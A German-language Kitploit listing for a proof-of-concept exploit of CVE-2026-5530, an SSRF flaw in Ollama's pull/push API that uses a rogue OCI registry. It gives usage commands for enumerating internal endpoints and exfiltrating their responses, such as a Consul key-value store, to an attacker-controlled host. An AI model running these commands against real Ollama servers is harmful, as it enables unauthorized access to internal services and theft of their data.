Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-5530 — Proof-of-Concept-Exploit für CVE-2026-5530, eine SSRF-Schwachstelle in Ollamas Pull/Push-API, die die Aufzählung interner Endpunkte und die vollständige Exfiltration von Antworten über eine betrügerische OCI-Registry ermöglicht. | Kitploit
Tools/GitHubGitHub/davidrxchester/cve-2026-5530
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffung
GitHubdavidrxchester/cve-2026-5530

CVE-2026-5530

Proof-of-Concept-Exploit für CVE-2026-5530, eine SSRF-Schwachstelle in Ollamas Pull/Push-API, die die Aufzählung interner Endpunkte und die vollständige Exfiltration von Antworten über eine betrügerische OCI-Registry ermöglicht.

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-5530

Ollama SSRF über OCI-Registry-Umleitung mit vollständiger Antwort-Exfiltration.

Writeup: https://davidrochester.com/posts/cve-2026-5530

Offenlegung

Ollama wurde mehrfach kontaktiert, ohne eine Antwort zu erhalten.

Verwendung

Drei Modi: enum, exfil und probe.

Enum

Findet interne Endpunkte, die vom Ollama-Host erreichbar sind.

root@kitploit:~
python3 poc.py targets.txt --registry-host <your-ip>

Exfil

Exfiltriert SSRF-Antworten, wenn die Antwortgröße bekannt ist.

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>

Probe

Führt eine binäre Suche nach der Antwortgröße durch und exfiltriert anschließend.

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>

Optionen

root@kitploit:~
target              URL oder Datei mit URLs (eine pro Zeile, # für Kommentare)
-p, --port          Port der betrügerischen Registry (Standard: 9999)
--exfil-port        Exfil-Registry-Port (Standard: 10000)
--exfil             Exfil-Modus, erfordert --size
--probe             Binäre Suche nach der Größe, dann Exfiltration
--size              Content-Length (erforderlich mit --exfil)
--registry-host     Ihre Angreifer-IP/Hostname, die Ollama erreichen kann
--ollama            Ollama-API-URL (Standard: http://127.0.0.1:11434)
Tool herunterladen